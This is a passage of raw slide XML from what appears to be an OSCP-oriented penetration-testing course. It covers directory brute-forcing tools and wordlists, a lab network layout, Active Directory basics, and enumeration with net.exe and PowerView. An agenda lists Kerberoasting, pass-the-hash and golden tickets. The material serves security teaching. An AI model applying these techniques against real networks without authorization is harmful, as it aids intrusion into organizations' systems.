              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – fastest, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (GUI version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AutoRecon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> by default, but it may use an old syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Change it in the TOML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wordlists are under /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/wordlists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Popular ones: </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/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/directory-list-2.3-medium.txt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/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>seclists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Discovery/Web-Content/common.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14520160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109416"/>
            <a:ext cx="10515600" cy="840230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15858661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27F1-F08F-4F09-BFE9-C3E9055CB355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29315534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7A166-21AE-474B-BBDF-4EE98C6C4916}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>262</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04F5BD7F-36AB-4DF4-BDCE-ECA7C0ABFE84}"/>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C9261E33-F169-4EAC-AA61-21D90DFBF89D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Brief AD Overview + Enumeration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Authentication in AD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Obtaining Credentials/Hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Using hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PTH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Over-PTH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Silver Tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Persistence: Golden Tickets</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A picture containing text, grass, outdoor, yellow&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A44399CA-4BF1-4588-A750-1C3CA71D18E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="4525"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7601490" y="2196899"/>
            <a:ext cx="3865560" cy="2464201"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3150690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263</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Lab Setup</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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6247179A-4CF1-4395-8EE9-677A65E6A494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4508587" y="2515285"/>
            <a:ext cx="1787669" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>172.16.100.150</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F14276-B817-40F9-814E-7243AE4DEF44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248044" y="2515285"/>
            <a:ext cx="1915909" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.100.150</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61995" y="3828828"/>
            <a:ext cx="1915909" cy="2184263"/>
            <a:chOff x="9005229" y="3484295"/>
            <a:chExt cx="1915909" cy="2184263"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="TextBox 35">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04264196-1D35-45AD-B836-946F07E362E9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9005229" y="3484295"/>
              <a:ext cx="1915909" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>192.168.100.160</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24494" y="1119598"/>
            <a:ext cx="1938397" cy="2164384"/>
            <a:chOff x="8956772" y="1058462"/>
            <a:chExt cx="1938397" cy="2164384"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="TextBox 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3B5C5AD-A0F5-4449-8B50-D40138EE8C8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8956772" y="1058462"/>
              <a:ext cx="1915909" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent5">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>192.168.100.100</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18418924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9E85D0-AD62-4727-A44F-E06E99A055C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>264</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E70BDDB-A019-4D5B-BF0F-39E9BE3A0A90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AD Overview</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39FBAD09-DE1D-4CE4-A817-9EFA6C5383D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426721" y="1371600"/>
            <a:ext cx="6437726" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In short: a way to organize assets in an enterprise environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Individual domains can be grouped together to form forests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Critical knowledge for modern offensive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>security engagements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9" descr="A picture containing logo&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3AA4522-F971-4642-AA1A-9F6E5DD77125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7015920" y="2071687"/>
            <a:ext cx="4762500" cy="2714625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36867085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4EDC2F-E5CF-496A-89AE-29839997842E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>265</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6101EF23-8BCF-4F05-B88E-220A02669128}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key Components</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F911ACCB-963D-41D0-9245-F2450B5BB722}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1190624"/>
            <a:ext cx="11338560" cy="4842769"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain Controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The quarterback – governs authentication to domain resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AD Groups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ways to control permissions for a number of users concurrently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Organizational Units</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow for the easier/granular management of group policies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Group Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Policy that can govern everything from max login time to password policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5319838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E9A5F0-18B4-4153-B1A2-2E9979E8C16D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>266</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28ADA1B-9C4E-4A7C-AFD7-D76D1B9E5778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enumerating AD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A5CDC8-3D80-4EB3-8715-4FEAED5973C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="259228" y="1371600"/>
            <a:ext cx="11673544" cy="4572000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ net.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simply add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>– e.g.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> net user /domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PowerView.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DomainComputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DomainUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DomainGroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are the big ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some notes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bloodhound is great </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>but completely unnecessary for OSCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Don’t let Reddit tell you otherwise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Enum requires a domain-joined account </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> SYSTEM privileges on a domain-joined computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37591341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78FD2-DAB9-487E-A9CE-1E6F8DD69E4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>267</a:t>
            </a:fld>
